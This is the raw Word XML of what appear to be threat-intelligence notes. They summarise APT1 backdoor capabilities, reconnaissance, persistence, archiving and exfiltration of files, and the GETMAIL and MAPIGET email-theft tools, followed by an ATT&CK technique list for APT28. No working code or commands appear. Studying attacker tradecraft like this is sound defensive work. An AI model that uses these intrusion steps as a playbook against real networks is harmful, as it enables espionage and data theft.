    <w:p w14:paraId="1FDD73F1" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» List/start/stop processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB59EC6" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Modify the system registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98CA94" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Take screenshots of the user’s desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA04F87" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Capture keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417DDFC" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Capture mouse movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABF4C5" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Start an interactive command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA1CCE" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Create a Remote desktop (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> graphical) interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FF29D" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Harvest passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B3A8B" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Enumerate users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1A13E" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Enumerate other systems on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F38A95" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Sleep (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> go inactive) for a specified amount of time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621865C5" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Log off the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928305F" w14:textId="5D052921" w:rsidR="0027266E" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Shut down the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4C069" w14:textId="13304D67" w:rsidR="00B30CB4" w:rsidRDefault="00B30CB4" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The standard, non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol (to blend in with legitimate web traffic) or a custom protocol that the malware authors designed themselves. These backdoors give APT intruders a laundry list of ways to control victim systems,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F10F4" w14:textId="7FF8A346" w:rsidR="00C9752D" w:rsidRDefault="00C9752D" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CCFE5C" w14:textId="5D6931C4" w:rsidR="00054DDF" w:rsidRDefault="00054DDF" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Covert communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D755A" w14:textId="009CA38D" w:rsidR="00054DDF" w:rsidRDefault="00054DDF" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1249166E" w14:textId="47CEC990" w:rsidR="00A83F76" w:rsidRDefault="00A83F76" w:rsidP="00A83F76">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally, many of APT1’s backdoors use SSL encryption so that communications are hidden in an encrypted SSL tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0B714" w14:textId="2049FACA" w:rsidR="007A4616" w:rsidRPr="00085BC0" w:rsidRDefault="00316A64" w:rsidP="007A4616">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="007A4616">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Privilege Escalation (p3</w:t>
      </w:r>
      <w:r w:rsidR="001F7569">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007A4616">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63177194" w14:textId="143B1A16" w:rsidR="007A4616" w:rsidRDefault="007A4616" w:rsidP="007A4616"/>
    <w:p w14:paraId="57D2B0C0" w14:textId="2F22289C" w:rsidR="00A96D9A" w:rsidRPr="00085BC0" w:rsidRDefault="00316A64" w:rsidP="00A96D9A">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00A96D9A">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Internal Reconnaissance (p35+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40538C" w14:textId="3A648ADF" w:rsidR="00A96D9A" w:rsidRDefault="00A96D9A" w:rsidP="007A4616"/>
    <w:p w14:paraId="2E2ED753" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>This script performs the following functions and saves the results to a text file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560765E4" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» Display the victim’s network configuration information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCB464" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List the services that have started on the victim system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520154FE" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List currently running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18266712" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List accounts on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CEC5E" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List accounts with administrator privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661488EB" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>» List current network connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD5971B" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List currently connected network shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6912CAB0" w14:textId="77777777" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List other systems on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F80A498" w14:textId="60FB9097" w:rsidR="005C3450" w:rsidRDefault="005C3450" w:rsidP="005C3450">
      <w:r>
        <w:t>» List network computers and accounts according to group (“domain controllers,” “domain users,” “domain admins,” etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B25D63" w14:textId="5F7BBDE0" w:rsidR="005C3450" w:rsidRPr="00085BC0" w:rsidRDefault="00996F03" w:rsidP="005C3450">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
      <w:r w:rsidR="005C3450">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (p36+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E4A0B" w14:textId="5580B146" w:rsidR="00996F03" w:rsidRPr="00085BC0" w:rsidRDefault="00996F03" w:rsidP="00996F03">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Maintain Presence (p36+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6EA77" w14:textId="544EA550" w:rsidR="005C3450" w:rsidRDefault="00724698" w:rsidP="005C3450">
      <w:r w:rsidRPr="00724698">
        <w:t>Install new backdoors on multiple system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (potentially multiple in case one gets deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93B0A5" w14:textId="75699847" w:rsidR="00724698" w:rsidRDefault="00724698" w:rsidP="005C3450">
      <w:r w:rsidRPr="00724698">
        <w:t>Use legitimate VPN credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03DC5E" w14:textId="707687C0" w:rsidR="00724698" w:rsidRDefault="00724698" w:rsidP="005C3450">
      <w:r w:rsidRPr="00724698">
        <w:t>Log in to web portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42B2AF" w14:textId="7298C779" w:rsidR="00724698" w:rsidRDefault="00724698" w:rsidP="00724698">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Once armed with stolen credentials, APT1 intruders also attempt to log into web portals that the network offers. This includes not only restricted websites, but also web-based email systems such as Outlook Web Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC03DDB" w14:textId="121195AB" w:rsidR="002242E4" w:rsidRPr="00085BC0" w:rsidRDefault="004046A1" w:rsidP="002242E4">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004046A1">
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002242E4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Completing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002242E4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002242E4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mission (p37+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A295448" w14:textId="78DF2631" w:rsidR="002242E4" w:rsidRDefault="002242E4" w:rsidP="002242E4">
      <w:r>
        <w:t>Similar to other APT groups we track, once APT1 finds files of interest they pack them into archive files before stealing them. APT intruders most commonly use the RAR archiving utility for this task and ensure that the archives are password protected. Sometimes APT1 intruders use batch scripts to assist them in the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C90F87" w14:textId="4BB29285" w:rsidR="00636AA8" w:rsidRDefault="00636AA8" w:rsidP="00636AA8">
      <w:r>
        <w:t xml:space="preserve">After creating files compressed via RAR, the APT1 attackers will transfer files out of the network in ways that are consistent with other APT groups, including using the File Transfer Protocol (FTP) or their existing backdoors. Many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>times</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> their RAR files are so large that the attacker splits them into chunks before transferring them. Figure 19 above shows a RAR command with the option “-v200m”, which means that the RAR file should be split up into 200MB portions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CABE81D" w14:textId="21331351" w:rsidR="00E23592" w:rsidRDefault="00E23592" w:rsidP="00E23592">
      <w:r>
        <w:t>Unlike most other APT groups we track, APT1 uses two email-stealing utilities that we believe are unique to APT1. The first, GETMAIL, was designed specifically to extract email messages, attachments, and folders from within Microsoft Outlook archive (“PST”) files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78C7F2" w14:textId="61BDFAC1" w:rsidR="00E23592" w:rsidRPr="005A144C" w:rsidRDefault="00E23592" w:rsidP="00E23592">
      <w:r>
        <w:t>Whereas GETMAIL steals email in Outlook archive files, the second utility, MAPIGET, was designed specifically to steal email that has not yet been archived and still resides on a Microsoft Exchange Server. In order to operate successfully, MAPIGET requires username/password combinations that the Exchange server will accept. MAPIGET extracts email from specified accounts into text files (for the email body) and separate attachments, if there are any.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6EF41" w14:textId="77777777" w:rsidR="00891095" w:rsidRDefault="00891095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE5589" w14:textId="6E7E46A9" w:rsidR="00A365EB" w:rsidRDefault="00A365EB" w:rsidP="00A365EB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc110935508"/>
      <w:bookmarkStart w:id="45" w:name="_Toc153480846"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PT 28</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5D7F98F7" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="005B4630" w:rsidRDefault="00632139" w:rsidP="00632139">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc153480847"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="02824E90" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00605F46" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0007 - APT28 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C9FF6" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00605F46" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Russia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B617C4E" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00605F46" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is RU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAA84F"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1598.003', 'T1589.001', 'T1598', 'T1595.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647AECC"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T1598.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing for Information&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6709A89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T1589.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78968D7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1598 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing for Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BCEBF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T1595.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Active Scanning&gt;:Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B41F8A"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1583.006', 'T1586.002', 'T1588.002', 'T1583.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2AEAAA"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T1583.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22796D6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T1586.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767B73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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC201B"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9879F6"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1189', 'T1133', 'T1078.004', 'T1190', 'T1566.002', 'T1199', 'T1566.001', 'T1078', 'T1091']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B9727"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1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32834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r w:rsidRPr="00D81EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D81EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D81EFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2A836"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255BF7A9"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r w:rsidRPr="00C2729F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C2729F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1190 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C2729F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438D247"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74760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7DD5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1199 :</w:t>
      </w:r>
